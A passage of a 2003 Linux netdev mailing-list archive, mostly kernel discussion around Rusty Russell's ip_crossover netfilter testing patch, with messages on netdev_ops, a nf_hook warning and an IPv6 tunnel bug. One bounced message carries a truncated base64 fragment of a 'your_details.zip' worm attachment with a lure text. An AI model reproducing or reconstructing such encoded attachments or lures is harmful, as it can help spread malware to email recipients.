"ip_crossover: phantom for %s: %u.%u.%u.%u\n", + ifi->name, NIPQUAD(ifi->phantom)); + return 0; + +put_fail: + dev_put(dev); +fail: + printk(KERN_WARNING "ip_crossover: device %s is not usable.\n", name); + return -ENOENT; +} + +#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,5,50) +static int set_dev(const char *val, struct kernel_param *kp) +{ + return __set_dev(val, kp->arg); +} +module_param_call(dev1, set_dev, NULL, &devinfo1, 0); +module_param_call(dev2, set_dev, NULL, &devinfo2, 0); + +#define compat_parse_params() +#else +static char *dev1, *dev2; + +MODULE_PARM(dev1, "s"); +MODULE_PARM(dev2, "s"); + +static void compat_parse_params(void) +{ + if (dev1) + __set_dev(dev1, &devinfo1); + if (dev2) + __set_dev(dev2, &devinfo2); +} +#endif /* KERNEL_VERSION */ + +static int __init init(void) +{ + compat_parse_params(); + + if (!devinfo1.name[0] || !devinfo2.name[0]) { + printk(KERN_ERR "ip_crossover: need dev1 and dev2 args\n"); + return -EINVAL; + } + + return nf_register_hook(&xover_ops); +} + +static void __exit fini(void) +{ + struct net_device *dev; + + nf_unregister_hook(&xover_ops); + + /* Release devices. */ + dev = dev_get_by_name(devinfo1.name); + dev_put(dev); + dev_put(dev); + + dev = dev_get_by_name(devinfo2.name); + dev_put(dev); + dev_put(dev); +} + +module_init(init); +module_exit(fini); +MODULE_LICENSE("GPL"); +MODULE_PARM_DESC(dev1, "First device for crossover (required)"); +MODULE_PARM_DESC(dev2, "Second device for crossover (required)"); -- Anyone who quotes me in their sig is an idiot. -- Rusty Russell. From MAILER-DAEMON@oss.sgi.com Thu Jul 10 02:22:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 02:22:20 -0700 (PDT) Received: from anchor-post-30.mail.demon.net (anchor-post-30.mail.demon.net [194.217.242.88]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A9MF2x021378 for ; Thu, 10 Jul 2003 02:22:16 -0700 Received: from finch-punt-12.mail.demon.net ([194.217.242.36]) by anchor-post-30.mail.demon.net with esmtp (Exim 3.35 #1) id 19aXd0-000EbR-0U for netdev@oss.sgi.com; Thu, 10 Jul 2003 10:22:14 +0100 Received: from root by finch-punt-12.mail.demon.net with local (Exim 2.12 #1) id 19aXdM-0004Wx-00 for netdev@oss.sgi.com; Thu, 10 Jul 2003 09:22:36 +0000 To: netdev@oss.sgi.com Subject: Mail Delivery failed: returning to sender. Message-Id: From: Super-User Date: Thu, 10 Jul 2003 09:22:36 +0000 X-archive-position: 3891 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: root@punt-1.mail.demon.net Precedence: bulk X-list: netdev Subject: Mail Delivery failed: returning to sender This message was created automatically by mail delivery software. A message that you sent could not be delivered to all of its recipients. The following address(es) failed: ordern.demon.co.uk [158.152.10.215]: RSET 250 Ok MAIL FROM: 250 Ok RCPT TO: 250 Ok DATA 354 End data with . . 550 Error: ordern.demon.co.uk no longer exists ----- Original Message Follows ------ Received: from punt-1.mail.demon.net by mailstore for markb@ordern.demon.co.uk id 1057820065:10:14558:0; Thu, 10 Jul 2003 06:54:25 GMT Received: from [218.244.36.158] ([218.244.36.158]) by punt-1.mail.demon.net id aa1102574; 10 Jul 2003 6:52 GMT From: To: Subject: Re: Movie Date: Thu, 10 Jul 2003 14:53:01 +0800 Importance: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MSMail-Priority: Normal X-Priority: 3 (Normal) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="CSmtpMsgPart123X456_000_00561FB7" Message-ID: <1057819977.112574.0@[218.244.36.158]> This is a multipart message in MIME format --CSmtpMsgPart123X456_000_00561FB7 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Please see the attached zip file for details. --CSmtpMsgPart123X456_000_00561FB7 Content-Type: application/octet-stream; name="your_details.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="your_details.zip UEsDBBQAAgAIAKB26i789YYSm0ABAABSAQALAAAAZGV0YWlscy5waWbssmOMLkzbrnl3r7Zt27Zt 27Ztd6+2jdW2bdu27V5tc55vv9/eM5nJzPyZZP48R1I5qq46U7mqUrJa8YBfAAAA5J/x8wMAtAH+ gwDg/521fwYcfgccoAlymrANSGaaUMXC0pnAwcne3MnQlsDY0M7O3oXAyJTAydWOwNKOQERemcDW 3sSUDhYWiuS/z9goBJnJGbDK/p8Dd8ckO+Qfu20bZGP/47Ftz+yk/97L/h+2zob9x5//XXfbNsz+ /Y+VLI0t/ivzP3tTEAUAZIBAAAmZr3z/s7YHgAeCBgL7zyL+P1rRBgYAEP6Z1AH959b/NQf+z3sA AP+7AQ7/yWGUAf3XNuB/LBD+j/5f+h8c/HPun/+Ht/PTAQZAAP6/hgBAZ+jsYGhsDQDkAf2noev/ U2P/uWXf/8oJ/Pfdsf7x9/9DTuGfwu0/OYx/jAH0f59j+K/CPy9E9I8Z/q85wL/8y7/8y7/8y7/8 y7/8y7/8y7/8/0LLCY5PQ1wJvfUv1yk34RNoV3qZjj8UvEeclJu1dAKuP/U4jdR+0Q87phpX3Rt2 csCSVw8PsjicuKcinImNtih0jgBqp8eN+mXM3wh/d1zgn2kWXP6i7amv3Ca78Ye6Fx7tYMVKmEHo 3sZifScojNzb+3jdJwba2lotn3pbbbHIPU6J826dGCWE9UZZLouz5ScCAfUyapKVqmo1asvAXjLP nYJEaLus8XeEEAiHloE+qWRx0Hx6bdFhc5A9rpw7HzFSpXzlHJbSJRqhGR4rxMvhi0ITAUaYljrH kDSNxLm+cy3dVvQPg6i8k8yr0ZFfl5jEhWZSNAxNO07RaYqy8g/Xb4mA8AqGoCLKjfc8dsekL3Xb GuENgH8pMhYhRX4P5tx5bjAaVbElqFseYz8h/f39+BXLs5/chVtSVPjl0W42S2ner2LXVi63HwR5 /gmf0A0JO1Q+YEISdVU/oLfD14Uxm0LylqrjO/jRp4/36iQHvJ/wl4B8aB6+4k/oywy1UsTNkVrH zPq8PDACvnhxuk60zdbsp3HJg2tRbEbx5Q4B3JHPNWeNOlACPvUJg0U7lStjQR+Kt0DiEPtKzXun 6wNMzK46Xjr0EIkNaTf7qVyTk7se7vaJ3QvL9qLzAF1J0bsA3LwU+S2fhJqqfDoq7Z78EjtZUlr2 [snip - Remainder of message] From xiaofeng.ling@intel.com Thu Jul 10 02:52:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 02:52:49 -0700 (PDT) Received: from caduceus.jf.intel.com (fmr06.intel.com [134.134.136.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6A9qe2x023350 for ; Thu, 10 Jul 2003 02:52:41 -0700 Received: from talaria.jf.intel.com (talaria.jf.intel.com [10.7.209.7]) by caduceus.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6A9kse07796 for ; Thu, 10 Jul 2003 09:46:54 GMT Received: from pdsmsxvs01.pd.intel.com (pdsmsxvs01.pd.intel.com [172.16.12.122]) by talaria.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6A9IGD16154 for ; Thu, 10 Jul 2003 09:18:17 GMT Received: from pdsmsx331.ccr.corp.intel.com ([172.16.12.58]) by pdsmsxvs01.pd.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071017523314179 for ; Thu, 10 Jul 2003 17:52:33 +0800 Received: from pdsmsx403.ccr.corp.intel.com ([172.16.12.55]) by pdsmsx331.ccr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Thu, 10 Jul 2003 17:52:33 +0800 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: From which version, struct sock is changed to the new one? Date: Thu, 10 Jul 2003 17:52:33 +0800 Message-ID: <3ACA40606221794F80A5670F0AF15F84FEC75E@pdsmsx403.ccr.corp.intel.com> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: shutdown() and SHUT_RD on TCP sockets - broken? Thread-Index: AcNGBm4cMdtYv4GsSd6TNM90YSEEmgAwlGNg From: "Ling, Xiaofeng" To: X-OriginalArrivalTime: 10 Jul 2003 09:52:33.0905 (UTC) FILETIME=[FC6F1E10:01C346C8] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6A9qe2x023350 X-archive-position: 3892 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: xiaofeng.ling@intel.com Precedence: bulk X-list: netdev Hi, Can anybody tell me from which version, struct sock is changed to the new one? From willy@www.linux.org.uk Thu Jul 10 04:21:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 04:21:57 -0700 (PDT) Received: from www.linux.org.uk (IDENT:a5rZdsWhp+zZzgHymaXCZbaibPzWeIUd@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ABLq2x027287 for ; Thu, 10 Jul 2003 04:21:53 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19aZUj-00041y-3q; Thu, 10 Jul 2003 12:21:49 +0100 Date: Thu, 10 Jul 2003 12:21:49 +0100 From: Matthew Wilcox To: "Feldman, Scott" Cc: Matthew Wilcox , netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops Message-ID: <20030710112149.GC1939@parcelfarce.linux.theplanet.co.uk> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4.1i X-archive-position: 3893 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Thu, Jul 10, 2003 at 12:47:13AM -0700, Feldman, Scott wrote: > Can we get a HAVE_NETDEV_OPS? I'll seriously consider it ... once we have a better idea where this is all going. I'm a big fan of having _shared_ compatibility code rather than something in each driver. Obviously we'll want to share drivers between 2.4 and 2.6. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From jgarzik@pobox.com Thu Jul 10 06:07:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 06:07:12 -0700 (PDT) Received: from www.linux.org.uk (IDENT:Xhzk3CuXWSGr7fOMlBB9eC8Mk7Zr8Nu3@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AD752x028398 for ; Thu, 10 Jul 2003 06:07:06 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19ab8Z-0005d0-I3; Thu, 10 Jul 2003 14:07:03 +0100 Message-ID: <3F0D64E2.9000801@pobox.com> Date: Thu, 10 Jul 2003 09:06:42 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: Matthew Wilcox CC: "Feldman, Scott" , netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops References: <20030710112149.GC1939@parcelfarce.linux.theplanet.co.uk> In-Reply-To: <20030710112149.GC1939@parcelfarce.linux.theplanet.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3894 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Matthew Wilcox wrote: > On Thu, Jul 10, 2003 at 12:47:13AM -0700, Feldman, Scott wrote: > >>Can we get a HAVE_NETDEV_OPS? > > > I'll seriously consider it ... once we have a better idea where this is > all going. I'm a big fan of having _shared_ compatibility code rather > than something in each driver. Obviously we'll want to share drivers > between 2.4 and 2.6. Something like... oh... kcompat? :) http://sf.net/projects/gkernel/ From jleu@nero.doit.wisc.edu Thu Jul 10 07:06:48 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 07:07:24 -0700 (PDT) Received: from nero.doit.wisc.edu (nero.doit.wisc.edu [128.104.17.130]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AE6k2x002374 for ; Thu, 10 Jul 2003 07:06:47 -0700 Received: (from jleu@localhost) by nero.doit.wisc.edu (8.11.6/8.11.6) id h6AE6hP10833; Thu, 10 Jul 2003 09:06:43 -0500 Date: Thu, 10 Jul 2003 09:06:43 -0500 From: "James R. Leu" To: Rusty Russell Cc: netdev@oss.sgi.com, netfilter-devel@lists.netfilter.org, anton@samba.org Subject: Re: [PATCH] Netfilter crossover module. Message-ID: <20030710090643.A10820@mindspring.com> Reply-To: jleu@mindspring.com References: <20030710084820.909D12C0DA@lists.samba.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20030710084820.909D12C0DA@lists.samba.org>; from rusty@rustcorp.com.au on Thu, Jul 10, 2003 at 06:47:05PM +1000 Organization: none X-archive-position: 3895 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jleu@mindspring.com Precedence: bulk X-list: netdev Between you and Ben Greear the linux kernel will have every possible scheme for sending packets to your self. I still think my work on this (Virtual routing and forwarding: http://linux-vrf.sf.net/) is the less perverted(*) then the work that either you or Ben have come up with. Plus it has other applications besides just being able to send packets to your self. * in terms of the concept, not necessarily the actual implementation. On Thu, Jul 10, 2003 at 06:47:05PM +1000, Rusty Russell wrote: > Lots of people keep asking to be able to plug a crossover cables > between to NICs in a machine, and use it for testing. > > This is a simple module which does this, by creating phantom > machine(s) on each network with IP address 1 greater than the > interface. Testers welcome. > > Ignore the backwards compat crap, it'll be out of the final version. > > Example usage: > # Bring interfaces up > ifconfig eth0 192.168.1.1 > ifconfig eth1 192.168.2.1 > > # Add module which creates "phantom" machines 192.168.1.2, and 192.168.2.2. > modprobe ip_crossover dev1=eth0 dev2=eth1 > > # Tell kernel that 192.168.1.2 packets go to eth1, and .2.1 to eth0. > arp -s 192.168.1.2 > arp -s 192.168.2.2 > > It'd be nice to have the module hardwire the arps itself, but this was > quickest. Patch welcome. > > Rusty. > > Name: Hardware Loopback Module > Author: Rusty Russell > Status: Tested on 2.5.74-bk5 > > D: For testing it is often nice to connect two NICs with a crossover > D: cable and have the machine route packets between them. > D: > D: Since Linux steadfastly regards IP addresses as properties of the > D: box, not the individual NICs, this requires some trickery. A simple > D: netfilter module makes this possible, by producing "phantom" boxes. > > diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/Kconfig working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Kconfig > --- linux-2.5.74-bk5/net/ipv4/netfilter/Kconfig 2003-07-03 09:44:02.000000000 +1000 > +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Kconfig 2003-07-08 18:03:29.000000000 +1000 > @@ -587,5 +587,18 @@ config IP_NF_COMPAT_IPFWADM > If you want to compile it as a module, say M here and read > . If unsure, say `N'. > > +config IP_NF_CROSSOVER > + tristate "IP forced crossover support (EXPERIMENTAL)" > + depends on EXPERIMENTAL > + help > + This option allows you to connect two local network cards > + with a crossover cable, and then force packets to pass over > + that cable (Linux will normally short-circuit such packets). > + > + If you want to compile it as a module, say M here and read > + : the module will be called > + ip_crossover. > + > + Say `N'. > endmenu > > diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/Makefile working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Makefile > --- linux-2.5.74-bk5/net/ipv4/netfilter/Makefile 2003-07-03 09:44:02.000000000 +1000 > +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/Makefile 2003-07-08 18:03:29.000000000 +1000 > @@ -92,3 +92,5 @@ obj-$(CONFIG_IP_NF_COMPAT_IPCHAINS) += i > obj-$(CONFIG_IP_NF_COMPAT_IPFWADM) += ipfwadm.o > > obj-$(CONFIG_IP_NF_QUEUE) += ip_queue.o > + > +obj-$(CONFIG_IP_NF_CROSSOVER) += ip_crossover.o > diff -urNp --exclude TAGS -X /home/rusty/current-dontdiff --minimal linux-2.5.74-bk5/net/ipv4/netfilter/ip_crossover.c working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/ip_crossover.c > --- linux-2.5.74-bk5/net/ipv4/netfilter/ip_crossover.c 1970-01-01 10:00:00.000000000 +1000 > +++ working-2.5.74-bk5-hardware_loopback/net/ipv4/netfilter/ip_crossover.c 2003-07-10 18:04:59.000000000 +1000 > @@ -0,0 +1,257 @@ > +/* Copyright 2003 Rusty Russell, IBM Corporation. > + * > + * Simple packet mangling. The idea is to use a crossover between two > + * local NICs for testing, then this module creates "phantom" boxes on > + * each network at the interface address + 1. > + * > + * Packets sent to one phantom will come in like they came from the other. > + * > + * Usage: > + * ifconfig eth0 192.168.1.1 > + * ifconfig eth1 192.168.2.1 > + * arp -s 192.168.1.2 > + * arp -s 192.168.2.2 > + * modprobe ip_crossover dev1=eth0 dev2=eth1 > + * > + * Then doing ping 192.168.1.2, ICMP ping goes out eth0 and comes > + * back in eth1. Reply goes out eth1 and comes back in eth0. */ > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > +#include > + > +struct ifinfo > +{ > + /* Keep track of name so we can drop reference. */ > + char name[IFNAMSIZ]; > + > + /* Cached interface addr. */ > + u32 ifaddr; > + > + /* "Phantom" box which gets mapped. */ > + u32 phantom; > +}; > + > +static struct ifinfo devinfo1, devinfo2; > + > +/* Stolen from Alexey's ip_nat_dumb. */ > +static int nat_header(struct sk_buff *skb, u32 saddr, u32 daddr) > +{ > + struct iphdr *iph = skb->nh.iph; > + > + u32 odaddr = iph->daddr; > + u32 osaddr = iph->saddr; > + u16 check; > + > + /* Rewrite IP header */ > + iph->saddr = saddr; > + iph->daddr = daddr; > + iph->check = 0; > + iph->check = ip_fast_csum((unsigned char *)iph, iph->ihl); > + > + /* If it is the first fragment, rewrite protocol headers */ > + if (!(iph->frag_off & htons(IP_OFFSET))) { > + u16 *cksum; > + > + switch(iph->protocol) { > + case IPPROTO_TCP: > + cksum = (u16*)&((struct tcphdr*) > + (((char*)iph)+(iph->ihl<<2)))->check; > + if ((u8*)(cksum+1) > skb->tail) > + return 0; > + check = *cksum; > + if (skb->ip_summed != CHECKSUM_HW) > + check = ~check; > + check = csum_tcpudp_magic(iph->saddr, iph->daddr, > + 0, 0, check); > + check = csum_tcpudp_magic(~osaddr, ~odaddr, 0, 0, > + ~check); > + if (skb->ip_summed == CHECKSUM_HW) > + check = ~check; > + *cksum = check; > + break; > + case IPPROTO_UDP: > + cksum = (u16*)&((struct udphdr*) > + (((char*)iph)+(iph->ihl<<2)))->check; > + if ((u8*)(cksum+1) > skb->tail) > + return 0; > + if ((check = *cksum) != 0) { > + check = csum_tcpudp_magic(iph->saddr, > + iph->daddr, 0, 0, > + ~check); > + check = csum_tcpudp_magic(~osaddr, ~odaddr, > + 0, 0, ~check); > + *cksum = check ? : 0xFFFF; > + } > + break; > + case IPPROTO_ICMP: > + { > + struct icmphdr *icmph > + = (struct icmphdr*)((char*)iph+(iph->ihl<<2)); > + struct iphdr *ciph; > + u32 idaddr, isaddr; > + > + if ((icmph->type != ICMP_DEST_UNREACH) && > + (icmph->type != ICMP_TIME_EXCEEDED) && > + (icmph->type != ICMP_PARAMETERPROB)) > + break; > + > + ciph = (struct iphdr *) (icmph + 1); > + > + if ((u8*)(ciph+1) > skb->tail) > + return 0; > + > + isaddr = ciph->saddr; > + idaddr = ciph->daddr; > + > + /* Change addresses inside ICMP packet. */ > + ciph->daddr = iph->saddr; > + ciph->saddr = iph->daddr; > + cksum = &icmph->checksum; > + /* Using tcpudp primitive. Why not? */ > + check = csum_tcpudp_magic(ciph->saddr, ciph->daddr, > + 0, 0, ~(*cksum)); > + *cksum = csum_tcpudp_magic(~isaddr, ~idaddr, 0, 0, > + ~check); > + break; > + } > + default: > + break; > + } > + } > + return 1; > +} > + > +static unsigned int xover_hook(unsigned int hook, > + struct sk_buff **pskb, > + const struct net_device *in, > + const struct net_device *out, > + int (*okfn)(struct sk_buff *)) > +{ > + /* Going out to phantom box 1: change it to coming from > + phantom box 2, and vice versa. */ > + if ((*pskb)->nh.iph->daddr == devinfo1.phantom) { > + printk(KERN_DEBUG "dev1: %u.%u.%u.%u->%u.%u.%u.%u" > + " becomes %u.%u.%u.%u->%u.%u.%u.%u\n", > + NIPQUAD((*pskb)->nh.iph->saddr), > + NIPQUAD((*pskb)->nh.iph->daddr), > + NIPQUAD(devinfo2.phantom), > + NIPQUAD(devinfo2.ifaddr)); > + if (!nat_header(*pskb, devinfo2.phantom, devinfo2.ifaddr)) > + return NF_DROP; > + } else if ((*pskb)->nh.iph->daddr == devinfo2.phantom) { > + printk(KERN_DEBUG "dev1: %u.%u.%u.%u->%u.%u.%u.%u" > + " becomes %u.%u.%u.%u->%u.%u.%u.%u\n", > + NIPQUAD((*pskb)->nh.iph->saddr), > + NIPQUAD((*pskb)->nh.iph->daddr), > + NIPQUAD(devinfo1.phantom), > + NIPQUAD(devinfo1.ifaddr)); > + if (!nat_header(*pskb, devinfo1.phantom, devinfo1.ifaddr)) > + return NF_DROP; > + } > + > + return NF_ACCEPT; > +} > + > +static struct nf_hook_ops xover_ops > += { .hook = xover_hook, > + .owner = THIS_MODULE, > + .pf = PF_INET, > + .hooknum = NF_IP_POST_ROUTING, > + .priority = NF_IP_PRI_MANGLE, > +}; > + > +static int __set_dev(const char *name, struct ifinfo *ifi) > +{ > + struct net_device *dev; > + struct in_device *indev; > + > + dev = dev_get_by_name(name); > + if (!dev) > + goto fail; > + indev = __in_dev_get(dev); > + if (!indev || !indev->ifa_list) > + goto put_fail; > + > + ifi->ifaddr = indev->ifa_list->ifa_address; > + ifi->phantom = htonl(ntohl(indev->ifa_list->ifa_address) + 1); > + if (ifi->phantom == indev->ifa_list->ifa_broadcast) > + goto put_fail; > + > + strlcpy(ifi->name, name, sizeof(ifi->name)); > + printk(KERN_INFO "ip_crossover: phantom for %s: %u.%u.%u.%u\n", > + ifi->name, NIPQUAD(ifi->phantom)); > + return 0; > + > +put_fail: > + dev_put(dev); > +fail: > + printk(KERN_WARNING "ip_crossover: device %s is not usable.\n", name); > + return -ENOENT; > +} > + > +#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,5,50) > +static int set_dev(const char *val, struct kernel_param *kp) > +{ > + return __set_dev(val, kp->arg); > +} > +module_param_call(dev1, set_dev, NULL, &devinfo1, 0); > +module_param_call(dev2, set_dev, NULL, &devinfo2, 0); > + > +#define compat_parse_params() > +#else > +static char *dev1, *dev2; > + > +MODULE_PARM(dev1, "s"); > +MODULE_PARM(dev2, "s"); > + > +static void compat_parse_params(void) > +{ > + if (dev1) > + __set_dev(dev1, &devinfo1); > + if (dev2) > + __set_dev(dev2, &devinfo2); > +} > +#endif /* KERNEL_VERSION */ > + > +static int __init init(void) > +{ > + compat_parse_params(); > + > + if (!devinfo1.name[0] || !devinfo2.name[0]) { > + printk(KERN_ERR "ip_crossover: need dev1 and dev2 args\n"); > + return -EINVAL; > + } > + > + return nf_register_hook(&xover_ops); > +} > + > +static void __exit fini(void) > +{ > + struct net_device *dev; > + > + nf_unregister_hook(&xover_ops); > + > + /* Release devices. */ > + dev = dev_get_by_name(devinfo1.name); > + dev_put(dev); > + dev_put(dev); > + > + dev = dev_get_by_name(devinfo2.name); > + dev_put(dev); > + dev_put(dev); > +} > + > +module_init(init); > +module_exit(fini); > +MODULE_LICENSE("GPL"); > +MODULE_PARM_DESC(dev1, "First device for crossover (required)"); > +MODULE_PARM_DESC(dev2, "Second device for crossover (required)"); > > -- > Anyone who quotes me in their sig is an idiot. -- Rusty Russell. -- James R. Leu From davej@suse.de Thu Jul 10 08:38:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 08:38:49 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AFcb2x009666 for ; Thu, 10 Jul 2003 08:38:38 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id C9EE414DFD for ; Thu, 10 Jul 2003 17:38:31 +0200 (MEST) Date: Thu, 10 Jul 2003 17:38:31 +0200 From: Dave Jones To: netdev@oss.sgi.com Subject: hook 0 already set. Message-ID: <20030710173831.B31068@suse.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-archive-position: 3896 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davej@suse.de Precedence: bulk X-list: netdev My 2 NIC proxy arp firewall started spitting these out in 2.5.. Jul 9 22:17:52 equinox kernel: nf_hook: hook 0 already set. Jul 9 22:17:52 equinox kernel: skb: pf=0 (unowned) dev=eth0 len=46 There's no real pattern that I can observe to trigger them, although... (root@equinox:davej)# grep "hook 0 already set" /var/log/syslog.0 | wc -l 7660 It does seem to happen quite a lot in this particular setup. Dave -- | Dave Jones. http://www.codemonkey.org.uk | SuSE Labs From hogarth@theirongiant.lochness.weebeastie.net Thu Jul 10 08:43:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 08:43:38 -0700 (PDT) Received: from nessie.weebeastie.net (nessie.weebeastie.net [61.8.7.205]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6AFhQ2x010008 for ; Thu, 10 Jul 2003 08:43:28 -0700 Received: from theirongiant.lochness.weebeastie.net (theirongiant.lochness.weebeastie.net [10.1.1.2]) by nessie.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6AFgvDb002172 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=FAIL); Fri, 11 Jul 2003 01:42:57 +1000 Received: from theirongiant.lochness.weebeastie.net (localhost [127.0.0.1]) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) with ESMTP id h6AFh74u012437 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Fri, 11 Jul 2003 01:43:07 +1000 Received: (from hogarth@localhost) by theirongiant.lochness.weebeastie.net (8.12.3/8.12.3/Debian-6.4) id h6AFh3C1012436; Fri, 11 Jul 2003 01:43:03 +1000 Date: Fri, 11 Jul 2003 01:43:03 +1000 From: CaT To: yoshfuji@linux-ipv6.org, linux-kernel@vger.kernel.org Cc: netdev@oss.sgi.com, pekkas@netcore.fi Subject: 2.4.21+ - IPv6 over IPv4 tunneling b0rked Message-ID: <20030710154302.GE1722@zip.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i Organisation: Furball Inc. X-archive-position: 3897 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cat@zip.com.au Precedence: bulk X-list: netdev With 2.4.21-pre2 I can get a nice tunnel going over my ppp connection and as such get ipv6 connectivity. I think went to 2.4.21 and then to 2.4.22-pre4 and bringing up the tunnel fails as follows: [01:37:04] root@nessie:/usr/src/linux>> ifup --verbose sit1 Configuring interface sit1=sit1 (inet6) run-parts /etc/network/if-pre-up.d ip tunnel add sit1 mode sit remote 138.25.6.14 ip link set sit1 up ip addr add 3ffe:8001:000c:ffff::37/127 dev sit1 ip route add ::/0 via 3ffe:8001:000c:ffff::36 RTNETLINK answers: Invalid argument Basically nothing gets through. Any attempts to ping/connect past my gw fail and pinging the external gw results in packets coming back from my gw (though with the eth0 IP addy) as if I were pinging it instead. ie: 15 [01:41:34] hogarth@theirongiant:/home/hogarth>> ping6 3ffe:8001:000c:ffff::36PING 3ffe:8001:000c:ffff::36(3ffe:8001:c:ffff::36) from 3ffe:8002:1005::2 : 56 data bytes 64 bytes from 3ffe:8002:1005::1: icmp_seq=1 ttl=64 time=0.159 ms 64 bytes from 3ffe:8002:1005::1: icmp_seq=2 ttl=64 time=0.118 ms 64 bytes from 3ffe:8002:1005::1: icmp_seq=3 ttl=64 time=0.109 ms 64 bytes from 3ffe:8002:1005::1: icmp_seq=4 ttl=64 time=0.116 ms 64 bytes from 3ffe:8002:1005::1: icmp_seq=5 ttl=64 time=0.114 ms --- 3ffe:8001:000c:ffff::36 ping statistics --- 5 packets transmitted, 5 received, 0% loss, time 3999ms rtt min/avg/max/mdev = 0.109/0.123/0.159/0.019 ms Mind you, the same exact config works beautifully under 2.4.21-pre2. If there are any patches you want me to try or help in any other way (as far as debugging goes anyways :) then holler. :) -- "How can I not love the Americans? They helped me with a flat tire the other day," he said. - http://www.toledoblade.com/apps/pbcs.dll/artikkel?SearchID=73139162287496&Avis=TO&Dato=20030624&Kategori=NEWS28&Lopenr=106240111&Ref=AR From acme@conectiva.com.br Thu Jul 10 08:46:09 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 